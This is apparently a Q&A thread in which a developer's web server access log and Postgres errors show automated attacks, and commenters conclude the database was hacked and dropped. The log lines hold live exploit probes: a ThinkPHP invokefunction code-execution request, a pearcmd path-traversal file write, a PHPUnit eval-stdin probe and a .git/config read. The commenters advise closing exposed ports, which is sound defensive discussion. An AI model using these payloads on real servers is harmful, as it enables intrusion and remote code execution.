172.20.0.2 - - [29/Aug/2024 11:03:51] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:51] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:52] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:52] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:03:52] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:19:37] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:37] "GET /ab2g HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:37] "GET /ab2h HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:38] "GET /alive.php HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:40] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:41] "GET /t4 HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:41] "GET /favicon.ico HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:42] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 11:30:42] "GET /teorema505?t=1 HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 12:06:25] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 12:09:14] "GET /.git/config HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 12:12:38] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 12:12:47] "GET / HTTP/1.0" 404 -
172.20.0.2 - - [29/Aug/2024 12:24:21] "GET /expenses HTTP/1.0" 500 -


The problem is FATAL:  password authentication failed for user "postgres" The postgres user is not connecting.

@AdrianKlaver Why would it drop the database though?

It is not ERROR:  cannot drop the currently open database. You need to spend more time reading the log there is a lot going wrong.

@AdrianKlaver 2024-08-29 13:03:46.937 UTC [1881] FATAL:  database "expenses" does not exist

You are being hacked. A lot of attempts to guess your password followed by someone ( helpfully) dropping your database so you are forced to fix your security.

Somebody is hacking you, close your network and/or firewall as soon as possible! And check the status of your machine, the bad guys might be in already

teorema505 is related to malware, check Google for details

Do you really need to leave the ports open to the world  ? why do not you just remove this lines     ports:
- 5432:5432

You should delete that line from your init-db.sql script
ALTER ROLE postgres SET search_path TO em;

There are a lot of errors before the script ever gets to above, most dealing with role presence and authentication. This does not qualify as an answer it is a comment. Either update to an actual answer or delete it.
